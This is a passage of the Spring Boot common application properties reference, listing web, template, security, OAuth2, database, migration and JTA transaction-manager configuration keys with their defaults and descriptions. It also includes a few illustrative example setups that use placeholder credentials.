({sc-spring-boot-autoconfigure}\/hateoas\/HateoasProperties.{sc-ext}[HateoasProperties])\n\tspring.hateoas.use-hal-as-default-json-media-type=true # Specify if application\/hal+json responses should be sent to requests that accept application\/json.\n\n\t# HTTP message conversion\n\tspring.http.converters.preferred-json-mapper=jackson # Preferred JSON mapper to use for HTTP message conversion. Set to \"gson\" to force the use of Gson when both it and Jackson are on the classpath.\n\n\t# HTTP encoding ({sc-spring-boot-autoconfigure}\/web\/HttpEncodingProperties.{sc-ext}[HttpEncodingProperties])\n\tspring.http.encoding.charset=UTF-8 # Charset of HTTP requests and responses.
Added to the \"Content-Type\" header if not set explicitly.\n\tspring.http.encoding.enabled=true # Enable http encoding support.\n\tspring.http.encoding.force=true # Force the encoding to the configured charset on HTTP requests and responses.\n\n\t# JACKSON ({sc-spring-boot-autoconfigure}\/jackson\/JacksonProperties.{sc-ext}[JacksonProperties])\n\tspring.jackson.date-format= # Date format string or a fully-qualified date format class name. For instance `yyyy-MM-dd HH:mm:ss`.\n\tspring.jackson.deserialization.*= # Jackson on\/off features that affect the way Java objects are deserialized.\n\tspring.jackson.generator.*= # Jackson on\/off features for generators.\n\tspring.jackson.joda-date-time-format= # Joda date time format string. If not configured, \"date-format\" will be used as a fallback if it is configured with a format string.\n\tspring.jackson.locale= # Locale used for formatting.\n\tspring.jackson.mapper.*= # Jackson general purpose on\/off features.\n\tspring.jackson.parser.*= # Jackson on\/off features for parsers.\n\tspring.jackson.property-naming-strategy= # One of the constants on Jackson's PropertyNamingStrategy. Can also be a fully-qualified class name of a PropertyNamingStrategy subclass.\n\tspring.jackson.serialization.*= # Jackson on\/off features that affect the way Java objects are serialized.\n\tspring.jackson.serialization-inclusion= # Controls the inclusion of properties during serialization. Configured with one of the values in Jackson's JsonInclude.Include enumeration.\n\tspring.jackson.time-zone= # Time zone used when formatting dates. For instance `America\/Los_Angeles`\n\n\t# JERSEY ({sc-spring-boot-autoconfigure}\/jersey\/JerseyProperties.{sc-ext}[JerseyProperties])\n\tspring.jersey.application-path= # Path that serves as the base URI for the application. Overrides the value of \"@ApplicationPath\" if specified.\n\tspring.jersey.filter.order=0 # Jersey filter chain order.\n\tspring.jersey.init.*= # Init parameters to pass to Jersey via the servlet or filter.\n\tspring.jersey.type=servlet # Jersey integration type. 
Can be either \"servlet\" or \"filter\".\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enable-fallback=false # Enable support for fallback resolution.\n\tspring.mobile.devicedelegatingviewresolver.enabled=false # Enable device view resolver.\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/ # Prefix that gets prepended to view names for mobile devices.\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix= # Suffix that gets appended to view names for mobile devices.\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix= # Prefix that gets prepended to view names for normal devices.\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix= # Suffix that gets appended to view names for normal devices.\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/ # Prefix that gets prepended to view names for tablet devices.\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix= # Suffix that gets appended to view names for tablet devices.\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # Enable SitePreferenceHandler.\n\n\t# MUSTACHE TEMPLATES ({sc-spring-boot-autoconfigure}\/mustache\/MustacheAutoConfiguration.{sc-ext}[MustacheAutoConfiguration])\n\tspring.mustache.cache=false # Enable template caching.\n\tspring.mustache.charset=UTF-8 # Template encoding.\n\tspring.mustache.check-template-location=true # Check that the templates location exists.\n\tspring.mustache.content-type=text\/html # Content-Type value.\n\tspring.mustache.enabled=true # Enable MVC view resolution for this technology.\n\tspring.mustache.prefix=classpath:\/templates\/ # Prefix to apply to template names.\n\tspring.mustache.suffix=.html # Suffix to apply to template names.\n\tspring.mustache.view-names= # White list of view names that can be resolved.\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/WebMvcProperties.{sc-ext}[WebMvcProperties])\n\tspring.mvc.async.request-timeout= # Amount of time (in milliseconds) before asynchronous request handling times out.\n\tspring.mvc.date-format= # Date format to use. For instance `dd\/MM\/yyyy`.\n\tspring.mvc.dispatch-trace-request=false # Dispatch TRACE requests to the FrameworkServlet doService method.\n\tspring.mvc.dispatch-options-request=false # Dispatch OPTIONS requests to the FrameworkServlet doService method.\n\tspring.mvc.favicon.enabled=true # Enable resolution of favicon.ico.\n\tspring.mvc.ignore-default-model-on-redirect=true # If the content of the \"default\" model should be ignored during redirect scenarios.\n\tspring.mvc.locale= # Locale to use.\n\tspring.mvc.media-types.*= # Maps file extensions to media types for content negotiation.\n\tspring.mvc.message-codes-resolver-format= # Formatting strategy for message codes. 
For instance `PREFIX_ERROR_CODE`.\n\tspring.mvc.static-path-pattern=\/** # Path pattern used for static resources.\n\tspring.mvc.throw-exception-if-no-handler-found=false # If a \"NoHandlerFoundException\" should be thrown if no Handler was found to process a request.\n\tspring.mvc.view.prefix= # Spring MVC view prefix.\n\tspring.mvc.view.suffix= # Spring MVC view suffix.\n\n\t# SPRING RESOURCES HANDLING ({sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[ResourceProperties])\n\tspring.resources.add-mappings=true # Enable default resource handling.\n\tspring.resources.cache-period= # Cache period for the resources served by the resource handler, in seconds.\n\tspring.resources.chain.cache=true # Enable caching in the Resource chain.\n\tspring.resources.chain.enabled= # Enable the Spring Resource Handling chain. Disabled by default unless at least one strategy has been enabled.\n\tspring.resources.chain.html-application-cache=false # Enable HTML5 application cache manifest rewriting.\n\tspring.resources.chain.strategy.content.enabled=false # Enable the content Version Strategy.\n\tspring.resources.chain.strategy.content.paths=\/** # Comma-separated list of patterns to apply to the Version Strategy.\n\tspring.resources.chain.strategy.fixed.enabled=false # Enable the fixed Version Strategy.\n\tspring.resources.chain.strategy.fixed.paths= # Comma-separated list of patterns to apply to the Version Strategy.\n\tspring.resources.chain.strategy.fixed.version= # Version string to use for the Version Strategy.\n\tspring.resources.static-locations=classpath:\/META-INF\/resources\/,classpath:\/resources\/,classpath:\/static\/,classpath:\/public\/ # Locations of static resources.\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=false # Enable the connection status view for supported providers.\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.cache=true # Enable template caching.\n\tspring.thymeleaf.check-template-location=true # Check that the templates location exists.\n\tspring.thymeleaf.content-type=text\/html # Content-Type value.\n\tspring.thymeleaf.enabled=true # Enable MVC Thymeleaf view resolution.\n\tspring.thymeleaf.encoding=UTF-8 # Template encoding.\n\tspring.thymeleaf.excluded-view-names= # Comma-separated list of view names that should be excluded from resolution.\n\tspring.thymeleaf.mode=HTML5 # Template mode to be applied to templates. 
See also StandardTemplateModeHandlers.\n\tspring.thymeleaf.prefix=classpath:\/templates\/ # Prefix that gets prepended to view names when building a URL.\n\tspring.thymeleaf.suffix=.html # Suffix that gets appended to view names when building a URL.\n\tspring.thymeleaf.template-resolver-order= # Order of the template resolver in the chain.\n\tspring.thymeleaf.view-names= # Comma-separated list of view names that can be resolved.\n\n\t# VELOCITY TEMPLATES ({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false # Set whether HttpServletRequest attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.velocity.allow-session-override=false # Set whether HttpSession attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.velocity.cache= # Enable template caching.\n\tspring.velocity.charset=UTF-8 # Template encoding.\n\tspring.velocity.check-template-location=true # Check that the templates location exists.\n\tspring.velocity.content-type=text\/html # Content-Type value.\n\tspring.velocity.date-tool-attribute= # Name of the DateTool helper object to expose in the Velocity context of the view.\n\tspring.velocity.enabled=true # Enable MVC view resolution for this technology.\n\tspring.velocity.expose-request-attributes=false # Set whether all request attributes should be added to the model prior to merging with the template.\n\tspring.velocity.expose-session-attributes=false # Set whether all HttpSession attributes should be added to the model prior to merging with the template.\n\tspring.velocity.expose-spring-macro-helpers=true # Set whether to expose a RequestContext for use by Spring's macro library, under the name \"springMacroRequestContext\".\n\tspring.velocity.number-tool-attribute= # Name of the NumberTool helper object to expose in the Velocity context of the view.\n\tspring.velocity.prefer-file-system-access=true # Prefer file system access for template loading. File system access enables hot detection of template changes.\n\tspring.velocity.prefix= # Prefix that gets prepended to view names when building a URL.\n\tspring.velocity.properties.*= # Additional velocity properties.\n\tspring.velocity.request-context-attribute= # Name of the RequestContext attribute for all views.\n\tspring.velocity.resource-loader-path=classpath:\/templates\/ # Template path.\n\tspring.velocity.suffix=.vm # Suffix that gets appended to view names when building a URL.\n\tspring.velocity.toolbox-config-location= # Velocity Toolbox config location. 
For instance `\/WEB-INF\/toolbox.xml`\n\tspring.velocity.view-names= # White list of view names that can be resolved.\n\n\n\t[[common-application-properties-security]]\n\t# ----------------------------------------\n\t# SECURITY PROPERTIES\n\t# ----------------------------------------\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.basic.authorize-mode=role # Security authorize mode to apply.\n\tsecurity.basic.enabled=true # Enable basic authentication.\n\tsecurity.basic.path=\/** # Comma-separated list of paths to secure.\n\tsecurity.basic.realm=Spring # HTTP basic realm name.\n\tsecurity.enable-csrf=false # Enable Cross Site Request Forgery support.\n\tsecurity.filter-order=0 # Security filter chain order.\n\tsecurity.filter-dispatcher-types=ASYNC, FORWARD, INCLUDE, REQUEST # Security filter chain dispatcher types.\n\tsecurity.headers.cache=true # Enable cache control HTTP headers.\n\tsecurity.headers.content-type=true # Enable \"X-Content-Type-Options\" header.\n\tsecurity.headers.frame=true # Enable \"X-Frame-Options\" header.\n\tsecurity.headers.hsts= # HTTP Strict Transport Security (HSTS) mode (none, domain, all).\n\tsecurity.headers.xss=true # Enable cross site scripting (XSS) protection.\n\tsecurity.ignored= # Comma-separated list of paths to exclude from the default secured paths.\n\tsecurity.require-ssl=false # Enable secure channel for all requests.\n\tsecurity.sessions=stateless # Session creation policy (always, never, if_required, stateless).\n\tsecurity.user.name=user # Default user name.\n\tsecurity.user.password= # Password for the default user name. A random password is logged on startup by default.\n\tsecurity.user.role=USER # Granted roles for the default user name.\n\n\t# SECURITY OAUTH2 CLIENT ({sc-spring-boot-autoconfigure}\/security\/oauth2\/OAuth2ClientProperties.{sc-ext}[OAuth2ClientProperties])\n\tsecurity.oauth2.client.client-id= # OAuth2 client id.\n\tsecurity.oauth2.client.client-secret= # OAuth2 client secret. A random secret is generated by default.\n\n\t# SECURITY OAUTH2 RESOURCES ({sc-spring-boot-autoconfigure}\/security\/oauth2\/resource\/ResourceServerProperties.{sc-ext}[ResourceServerProperties])\n\tsecurity.oauth2.resource.id= # Identifier of the resource.\n\tsecurity.oauth2.resource.jwt.key-uri= # The URI of the JWT token. Can be set if the value is not available and the key is public.\n\tsecurity.oauth2.resource.jwt.key-value= # The verification key of the JWT token. Can either be a symmetric secret or PEM-encoded RSA public key.\n\tsecurity.oauth2.resource.prefer-token-info=true # Use the token info, can be set to false to use the user info.\n\tsecurity.oauth2.resource.service-id=resource #\n\tsecurity.oauth2.resource.token-info-uri= # URI of the token decoding endpoint.\n\tsecurity.oauth2.resource.token-type= # The token type to send when using the userInfoUri.\n\tsecurity.oauth2.resource.user-info-uri= # URI of the user endpoint.\n\n\t# SECURITY OAUTH2 SSO ({sc-spring-boot-autoconfigure}\/security\/oauth2\/client\/OAuth2SsoProperties.{sc-ext}[OAuth2SsoProperties])\n\tsecurity.oauth2.sso.filter-order= # Filter order to apply if not providing an explicit WebSecurityConfigurerAdapter.\n\tsecurity.oauth2.sso.login-path=\/login # Path to the login page, i.e.
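the one that triggers the redirect to the OAuth2 Authorization Server\n\n\t# ---- EXAMPLE (illustrative only) ----\n\t# A hypothetical basic-auth setup tying together the SECURITY properties above;\n\t# the user name, password and ignored paths are placeholders.\n\tsecurity.basic.enabled=true\n\tsecurity.basic.path=\/api\/**\n\tsecurity.user.name=admin\n\tsecurity.user.password=s3cret\n\tsecurity.user.role=USER,ADMIN\n\tsecurity.ignored=\/public\/**,\/webjars\/**\n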
\n\n\n\t# ----------------------------------------\n\t# DATA PROPERTIES\n\t# ----------------------------------------\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.baseline-description= #\n\tflyway.baseline-version=1 # version to start migration\n\tflyway.baseline-on-migrate= #\n\tflyway.check-location=false # Check that the migration scripts location exists.\n\tflyway.clean-on-validation-error= #\n\tflyway.enabled=true # Enable flyway.\n\tflyway.encoding= #\n\tflyway.ignore-failed-future-migration= #\n\tflyway.init-sqls= # SQL statements to execute to initialize a connection immediately after obtaining it.\n\tflyway.locations=classpath:db\/migration # locations of migration scripts\n\tflyway.out-of-order= #\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\tflyway.placeholder-prefix= #\n\tflyway.placeholder-replacement= #\n\tflyway.placeholder-suffix= #\n\tflyway.placeholders.*= #\n\tflyway.schemas= # schemas to update\n\tflyway.sql-migration-prefix=V #\n\tflyway.sql-migration-separator= #\n\tflyway.sql-migration-suffix=.sql #\n\tflyway.table= #\n\tflyway.url= # JDBC url of the database to migrate. If not set, the primary configured data source is used.\n\tflyway.user= # Login user of the database to migrate.\n\tflyway.validate-on-migrate= #\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml # Change log configuration path.\n\tliquibase.check-change-log-location=true # Check that the change log location exists.\n\tliquibase.contexts= # Comma-separated list of runtime contexts to use.\n\tliquibase.default-schema= # Default database schema.\n\tliquibase.drop-first=false # Drop the database schema first.\n\tliquibase.enabled=true # Enable liquibase support.\n\tliquibase.labels= # Comma-separated list of runtime labels to use.\n\tliquibase.parameters.*= # Change log parameters.\n\tliquibase.password= # Login password of the database to migrate.\n\tliquibase.url= # JDBC url of the database to migrate.
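If not set, the primary configured data source is used.\n\n\t# ---- EXAMPLE (illustrative only) ----\n\t# A hypothetical Liquibase setup: explicit change log plus a dev-only context.\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml\n\tliquibase.contexts=dev\n\tliquibase.drop-first=false\n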
\n\tliquibase.user= # Login user of the database to migrate.\n\n\t# DAO ({sc-spring-boot-autoconfigure}\/dao\/PersistenceExceptionTranslationAutoConfiguration.{sc-ext}[PersistenceExceptionTranslationAutoConfiguration])\n\tspring.dao.exceptiontranslation.enabled=true # Enable the PersistenceExceptionTranslationPostProcessor.\n\n\t# CASSANDRA ({sc-spring-boot-autoconfigure}\/cassandra\/CassandraProperties.{sc-ext}[CassandraProperties])\n\tspring.data.cassandra.cluster-name= # Name of the Cassandra cluster.\n\tspring.data.cassandra.compression= # Compression supported by the Cassandra binary protocol.\n\tspring.data.cassandra.connect-timeout-millis= # Socket option: connection timeout.\n\tspring.data.cassandra.consistency-level= # Queries consistency level.\n\tspring.data.cassandra.contact-points=localhost # Comma-separated list of cluster node addresses.\n\tspring.data.cassandra.fetch-size= # Queries default fetch size.\n\tspring.data.cassandra.keyspace-name= # Keyspace name to use.\n\tspring.data.cassandra.load-balancing-policy= # Class name of the load balancing policy.\n\tspring.data.cassandra.port= # Port of the Cassandra server.\n\tspring.data.cassandra.password= # Login password of the server.\n\tspring.data.cassandra.read-timeout-millis= # Socket option: read timeout.\n\tspring.data.cassandra.reconnection-policy= # Reconnection policy class.\n\tspring.data.cassandra.retry-policy= # Class name of the retry policy.\n\tspring.data.cassandra.serial-consistency-level= # Queries serial consistency level.\n\tspring.data.cassandra.ssl=false # Enable SSL support.\n\tspring.data.cassandra.username= # Login user of the server.\n\n\t# COUCHBASE ({sc-spring-boot-autoconfigure}\/couchbase\/CouchbaseProperties.{sc-ext}[CouchbaseProperties])\n\tspring.data.couchbase.auto-index=false # Automatically create views and indexes.\n\tspring.data.couchbase.bootstrap-hosts=localhost # Couchbase nodes (host or IP address) to bootstrap from.\n\tspring.data.couchbase.bucket.name= # Name of the bucket to connect to.\n\tspring.data.couchbase.bucket.password= # Password of the bucket.\n\tspring.data.couchbase.consistency=read-your-own-writes # Consistency to apply by default on generated queries.\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties])\n\tspring.data.elasticsearch.cluster-name=elasticsearch # Elasticsearch cluster name.\n\tspring.data.elasticsearch.cluster-nodes= # Comma-separated list of cluster node addresses. If not specified, starts a client node.\n\tspring.data.elasticsearch.properties.*= # Additional properties used to configure the client.\n\tspring.data.elasticsearch.repositories.enabled=true # Enable Elasticsearch repositories.\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.authentication-database= # Authentication database name.\n\tspring.data.mongodb.database=test # Database name.\n\tspring.data.mongodb.field-naming-strategy= # Fully qualified name of the FieldNamingStrategy to use.\n\tspring.data.mongodb.grid-fs-database= # GridFS database name.\n\tspring.data.mongodb.host=localhost # Mongo server host.\n\tspring.data.mongodb.password= # Login password of the mongo server.\n\tspring.data.mongodb.port=27017 # Mongo server port.\n\tspring.data.mongodb.repositories.enabled=true # Enable Mongo repositories.\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # Mongo database URI.
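When set, host and port are ignored.\n\n\t# ---- EXAMPLE (illustrative only) ----\n\t# A hypothetical Mongo URI; host name, credentials and database are placeholders.\n\tspring.data.mongodb.uri=mongodb:\/\/appuser:secret@mongo1.example.com:27017\/appdb\n\tspring.data.mongodb.repositories.enabled=true\n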
\n\tspring.data.mongodb.username= # Login user of the mongo server.\n\n\t# DATA REST ({sc-spring-boot-autoconfigure}\/data\/rest\/RepositoryRestProperties.{sc-ext}[RepositoryRestProperties])\n\tspring.data.rest.base-path= # Base path to be used by Spring Data REST to expose repository resources.\n\tspring.data.rest.default-page-size= # Default size of pages.\n\tspring.data.rest.enable-enum-translation= # Enable enum value translation via the Spring Data REST default resource bundle.\n\tspring.data.rest.limit-param-name= # Name of the URL query string parameter that indicates how many results to return at once.\n\tspring.data.rest.max-page-size= # Maximum size of pages.\n\tspring.data.rest.page-param-name= # Name of the URL query string parameter that indicates what page to return.\n\tspring.data.rest.return-body-on-create= # Return a response body after creating an entity.\n\tspring.data.rest.return-body-on-update= # Return a response body after updating an entity.\n\tspring.data.rest.sort-param-name= # Name of the URL query string parameter that indicates what direction to sort results.\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr # Solr host. Ignored if \"zk-host\" is set.\n\tspring.data.solr.repositories.enabled=true # Enable Solr repositories.\n\tspring.data.solr.zk-host= # ZooKeeper host address in the form HOST:PORT.\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.continue-on-error=false # Do not stop if an error occurs while initializing the database.\n\tspring.datasource.data= # Data (DML) script resource reference.\n\tspring.datasource.dbcp.*= # Commons DBCP specific settings\n\tspring.datasource.dbcp2.*= # Commons DBCP2 specific settings\n\tspring.datasource.driver-class-name= # Fully qualified name of the JDBC driver. Auto-detected based on the URL by default.\n\tspring.datasource.hikari.*= # Hikari specific settings\n\tspring.datasource.initialize=true # Populate the database using 'data.sql'.\n\tspring.datasource.jmx-enabled=false # Enable JMX support (if provided by the underlying pool).\n\tspring.datasource.jndi-name= # JNDI location of the datasource. Class, url, username & password are ignored when set.\n\tspring.datasource.max-active= # For instance 100\n\tspring.datasource.max-idle= # For instance 8\n\tspring.datasource.max-wait=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.min-idle=8\n\tspring.datasource.name=testdb # Name of the datasource.\n\tspring.datasource.password= # Login password of the database.\n\tspring.datasource.platform=all # Platform to use in the schema resource (schema-${platform}.sql).\n\tspring.datasource.schema= # Schema (DDL) script resource reference.\n\tspring.datasource.separator=; # Statement separator in SQL initialization scripts.\n\tspring.datasource.sql-script-encoding= # SQL scripts encoding.\n\tspring.datasource.test-on-borrow= # For instance `false`\n\tspring.datasource.test-on-return= # For instance `false`\n\tspring.datasource.test-while-idle= #\n\tspring.datasource.time-between-eviction-runs-millis=\n\tspring.datasource.tomcat.*= # Tomcat datasource specific settings\n\tspring.datasource.type= # Fully qualified name of the connection pool implementation to use.
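By default, it is auto-detected from the classpath.\n\n\t# ---- EXAMPLE (illustrative only) ----\n\t# A hypothetical MySQL data source; the driver class is normally inferred from the URL.\n\tspring.datasource.url=jdbc:mysql:\/\/localhost:3306\/appdb\n\tspring.datasource.username=app\n\tspring.datasource.password=secret\n\tspring.datasource.test-on-borrow=true\n\tspring.datasource.validation-query=SELECT 1\n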
\n\tspring.datasource.url= # JDBC url of the database.\n\tspring.datasource.username=\n\tspring.datasource.validation-query=\n\n\t# H2 Web Console ({sc-spring-boot-autoconfigure}\/h2\/H2ConsoleProperties.{sc-ext}[H2ConsoleProperties])\n\tspring.h2.console.enabled=false # Enable the console.\n\tspring.h2.console.path=\/h2-console # Path at which the console will be available.\n\n\t# JOOQ ({sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration])\n\tspring.jooq.sql-dialect= # SQLDialect that jOOQ uses when communicating with the configured datasource. For instance `POSTGRES`\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.data.jpa.repositories.enabled=true # Enable JPA repositories.\n\tspring.jpa.database= # Target database to operate on, auto-detected by default. Can be alternatively set using the \"databasePlatform\" property.\n\tspring.jpa.database-platform= # Name of the target database to operate on, auto-detected by default. Can be alternatively set using the \"Database\" enum.\n\tspring.jpa.generate-ddl=false # Initialize the schema on startup.\n\tspring.jpa.hibernate.ddl-auto= # DDL mode. This is actually a shortcut for the \"hibernate.hbm2ddl.auto\" property. Defaults to \"create-drop\" when using an embedded database, \"none\" otherwise.\n\tspring.jpa.hibernate.naming-strategy= # Naming strategy fully qualified name.\n\tspring.jpa.open-in-view=true # Register OpenEntityManagerInViewInterceptor. Binds a JPA EntityManager to the thread for the entire processing of the request.\n\tspring.jpa.properties.*= # Additional native properties to set on the JPA provider.\n\tspring.jpa.show-sql=false # Enable logging of SQL statements.\n\n\t# JTA ({sc-spring-boot-autoconfigure}\/transaction\/jta\/JtaAutoConfiguration.{sc-ext}[JtaAutoConfiguration])\n\tspring.jta.enabled=true # Enable JTA support.\n\tspring.jta.log-dir= # Transaction logs directory.\n\tspring.jta.transaction-manager-id= # Transaction manager unique identifier.\n\n\t# ATOMIKOS\n\tspring.jta.atomikos.connectionfactory.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool.\n\tspring.jta.atomikos.connectionfactory.ignore-session-transacted-flag=true # Whether or not to ignore the transacted flag when creating sessions.\n\tspring.jta.atomikos.connectionfactory.local-transaction-mode=false # Whether or not local transactions are desired.\n\tspring.jta.atomikos.connectionfactory.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread.\n\tspring.jta.atomikos.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.atomikos.connectionfactory.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.max-pool-size=1 # The maximum size of the pool.\n\tspring.jta.atomikos.connectionfactory.min-pool-size=1 # The minimum size of the pool.\n\tspring.jta.atomikos.connectionfactory.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections.
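0 denotes no limit.\n\n\t# ---- EXAMPLE (illustrative only) ----\n\t# Hypothetical Atomikos pool sizing for an XA DataSource; the numbers are placeholders.\n\tspring.jta.atomikos.datasource.unique-resource-name=dataSource\n\tspring.jta.atomikos.datasource.min-pool-size=5\n\tspring.jta.atomikos.datasource.max-pool-size=20\n\tspring.jta.atomikos.datasource.borrow-connection-timeout=30\n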
\n\tspring.jta.atomikos.connectionfactory.unique-resource-name=jmsConnectionFactory # The unique name used to identify the resource during recovery.\n\tspring.jta.atomikos.datasource.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool.\n\tspring.jta.atomikos.datasource.default-isolation-level= # Default isolation level of connections provided by the pool.\n\tspring.jta.atomikos.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection.\n\tspring.jta.atomikos.datasource.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread.\n\tspring.jta.atomikos.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.atomikos.datasource.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.max-pool-size=1 # The maximum size of the pool.\n\tspring.jta.atomikos.datasource.min-pool-size=1 # The minimum size of the pool.\n\tspring.jta.atomikos.datasource.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.test-query= # SQL query or statement used to validate a connection before returning it.\n\tspring.jta.atomikos.datasource.unique-resource-name=dataSource # The unique name used to identify the resource during recovery.\n\tspring.jta.atomikos.properties.checkpoint-interval=500 # Interval between checkpoints.\n\tspring.jta.atomikos.properties.console-file-count=1 # Number of debug log files that can be created.\n\tspring.jta.atomikos.properties.console-file-limit=-1 # How many bytes can be stored at most in debug log files.\n\tspring.jta.atomikos.properties.console-file-name=tm.out # Debug log file name.\n\tspring.jta.atomikos.properties.console-log-level= # Console log level.\n\tspring.jta.atomikos.properties.default-jta-timeout=10000 # Default timeout for JTA transactions.\n\tspring.jta.atomikos.properties.enable-logging=true # Enable disk logging.\n\tspring.jta.atomikos.properties.force-shutdown-on-vm-exit=false # Specify if a VM shutdown should trigger forced shutdown of the transaction core.\n\tspring.jta.atomikos.properties.log-base-dir= # Directory in which the log files should be stored.\n\tspring.jta.atomikos.properties.log-base-name=tmlog # Transactions log file base name.\n\tspring.jta.atomikos.properties.max-actives=50 # Maximum number of active transactions.\n\tspring.jta.atomikos.properties.max-timeout=300000 # Maximum timeout (in milliseconds) that can be allowed for transactions.\n\tspring.jta.atomikos.properties.output-dir= # Directory in which to store the debug log files.\n\tspring.jta.atomikos.properties.serial-jta-transactions=true # Specify if sub-transactions should be joined when possible.\n\tspring.jta.atomikos.properties.service= # Transaction manager implementation that should be started.\n\tspring.jta.atomikos.properties.threaded-two-phase-commit=true # Use different (and concurrent) threads for two-phase commit on the participating resources.\n\tspring.jta.atomikos.properties.transaction-manager-unique-name= # Transaction manager's unique name.\n\n\t# BITRONIX\n\tspring.jta.bitronix.connectionfactory.acquire-increment=1 # Number of connections to create when growing the pool.\n\tspring.jta.bitronix.connectionfactory.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an
invalid connection was acquired.\n\tspring.jta.bitronix.connectionfactory.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool.\n\tspring.jta.bitronix.connectionfactory.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions.\n\tspring.jta.bitronix.connectionfactory.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted.\n\tspring.jta.bitronix.connectionfactory.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically.\n\tspring.jta.bitronix.connectionfactory.cache-producers-consumers=true # Whether or not producers and consumers should be cached.\n\tspring.jta.bitronix.connectionfactory.defer-connection-release=true # Whether or not the provider can run many transactions on the same connection and supports transaction interleaving.\n\tspring.jta.bitronix.connectionfactory.ignore-recovery-failures=false # Whether or not recovery failures should be ignored.\n\tspring.jta.bitronix.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the 